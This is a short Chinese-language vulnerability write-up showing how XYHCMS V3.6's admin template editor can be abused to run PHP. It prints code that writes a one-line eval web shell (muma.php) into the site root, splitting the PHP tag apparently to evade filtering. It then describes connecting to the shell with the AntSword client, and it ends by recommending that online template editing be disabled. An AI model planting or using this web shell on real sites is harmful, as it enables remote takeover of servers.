行云海CMS(XYHCMS)是完全开源的一套CMS内容管理系统，行云海CMS（XYHCMS）分为两个分支。XYHCMS3.x为最新版(需要php5.3+)；XYHCMS2.x为长期维护版(需要php5.2+)。

下载地址：http://www.xyhcms.com/down

版本：2022-06-17更新的V3.6版本

下载安装本地 前台效果：

找了一下后台模板编辑，找一个容易测试的，首页页面，来修改模板。

$file=fopen("muma.php","w");//根目录创建muma.php文件
fwrite($file,'<'); 
fwrite($file,'?');
fwrite($file,'php');
fwrite($file,' @eval($_POST["cmd"]);');
fwrite($file,'?>');
}

可以保存成功，我们运行下首页看下，是否会生成文件。

看下根目录下是否存在创建的文件。

使用蚁剑链接。

后台在线编辑模板，对维护者提供了方便，但是也埋下了隐患，为了安全，还是建议关闭在线编辑模板功能然后线下修改模板后上传！